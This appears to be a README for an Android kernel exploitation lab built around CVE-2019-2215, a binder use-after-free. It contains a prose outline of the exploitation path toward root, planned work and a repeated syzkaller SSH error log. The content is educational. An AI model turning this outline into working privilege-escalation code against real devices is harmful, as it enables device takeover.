Android Kernel Exploitation Lab

This lab guides you through setting up an environment to explore CVE-2019-2215, a critical Android kernel vulnerability in the binder subsystem.

Documentation

• Environment Setup
• Kernel privesc with gdb script
• Fuzzing with syzkaller
• Fuzzing with AFL++

Technical Details: CVE-2019-2215

This vulnerability is a use-after-free in the Android binder driver with the following characteristics:

1. Root Cause: When a binder fd is added to an epoll instance and then the thread exits, the binder_thread object is freed while still accessible through epoll.

2. Exploitation Path:

   • Add a binder file descriptor to an epoll instance
   • Call BINDER_THREAD_EXIT ioctl which frees binder_thread
   • Access the freed binder_thread through epoll
   • This leads to a use-after-free condition exploitable for privilege escalation

3. Impact: This vulnerability affects Android 8.x, 9.0, and early versions of 10, potentially allowing local privilege escalation to root.

4. Further Reading:

   • Original report on Project Zero
   • Patch in Android kernel

TODO

This lab is a work in progress. Here are planned improvements:

Short-term Improvements

• Fix Syzkaller configuration to properly target Android-specific syscalls
• Fix this Syzkaller issue

[    3.030651] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x2868278d270, max_idle_ns: 440795290098 ns
[    4.040338] clocksource: Switched to clocksource tsc
2025/03/24 21:04:23 running ssh: []string{"-p", "13199", "-F", "/dev/null", "-o", "UserKnownHostsFile=/dev/null", "-o", "IdentitiesOnly=yes", "-o", "BatchMode=yes", "-o", "StrictHostKeyChecking=no", "-o", "ConnectTimeout=10", "-i", "/home/0xbinder/android-kernel-exploitation-lab/bullseye.id_rsa", "-v", "root@localhost", "pwd"}
2025/03/24 21:04:33 ssh failed: failed to run ["ssh" "-p" "13199" "-F" "/dev/null" "-o" "UserKnownHostsFile=/dev/null" "-o" "IdentitiesOnly=yes" "-o" "BatchMode=yes" "-o" "StrictHostKeyChecking=no" "-o" "ConnectTimeout=10" "-i" "/home/0xbinder/android-kernel-exploitation-lab/bullseye.id_rsa" "-v" "root@localhost" "pwd"]: exit status 255
OpenSSH_9.9p2, OpenSSL 3.4.1 11 Feb 2025
debug1: Reading configuration data /dev/null
debug1: Connecting to localhost [::1] port 13199.
debug1: connect to address ::1 port 13199: Connection refused
debug1: Connecting to localhost [127.0.0.1] port 13199.
debug1: fd 3 clearing O_NONBLOCK
debug1: Connection established.
debug1: identity file /home/0xbinder/android-kernel-exploitation-lab/bullseye.id_rsa type 0
debug1: identity file /home/0xbinder/android-kernel-exploitation-lab/bullseye.id_rsa-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_9.9
Connection timed out during banner exchange
Connection to 127.0.0.1 port 13199 timed out

• Add detailed instructions for analyzing crash reports
• Include a simple exploit template for CVE-2019-2215
• Document proper kernel config settings for QEMU VM boot compatibility

Future Enhancements

• Add support for other Android kernel vulnerabilities
• Create a Docker container for easier setup
• Add more comprehensive debugging guides with GDB examples
• Implement a step-by-step guide for developing a full privilege escalation exploit
• Support for ARM64 architecture in addition to x86_64

Known Issues

[    3.030651] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x2868278d270, max_idle_ns: 440795290098 ns
[    4.040338] clocksource: Switched to clocksource tsc
2025/03/24 21:04:23 running ssh: []string{"-p", "13199", "-F", "/dev/null", "-o", "UserKnownHostsFile=/dev/null", "-o", "IdentitiesOnly=yes", "-o", "BatchMode=yes", "-o", "StrictHostKeyChecking=no", "-o", "ConnectTimeout=10", "-i", "/home/0xbinder/android-kernel-exploitation-lab/bullseye.id_rsa", "-v", "root@localhost", "pwd"}
2025/03/24 21:04:33 ssh failed: failed to run ["ssh" "-p" "13199" "-F" "/dev/null" "-o" "UserKnownHostsFile=/dev/null" "-o" "IdentitiesOnly=yes" "-o" "BatchMode=yes" "-o" "StrictHostKeyChecking=no" "-o" "ConnectTimeout=10" "-i" "/home/0xbinder/android-kernel-exploitation-lab/bullseye.id_rsa" "-v" "root@localhost" "pwd"]: exit status 255
OpenSSH_9.9p2, OpenSSL 3.4.1 11 Feb 2025
debug1: Reading configuration data /dev/null
debug1: Connecting to localhost [::1] port 13199.
debug1: connect to address ::1 port 13199: Connection refused
debug1: Connecting to localhost [127.0.0.1] port 13199.
debug1: fd 3 clearing O_NONBLOCK
debug1: Connection established.
debug1: identity file /home/0xbinder/android-kernel-exploitation-lab/bullseye.id_rsa type 0
debug1: identity file /home/0xbinder/android-kernel-exploitation-lab/bullseye.id_rsa-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_9.9
Connection timed out during banner exchange
Connection to 127.0.0.1 port 13199 timed out

Community Contributions

If you're interested in contributing to this project, please consider addressing any of the items above or submit your own ideas through a pull request.

Help

particularly looking for help with:

1. Fixing the known issues
2. Improving QEMU configuration for better compatibility with the Android kernel
3. Creating a reliable fuzzing setup that works across different Linux distributions

If you have expertise in these areas, your contributions would be greatly appreciated!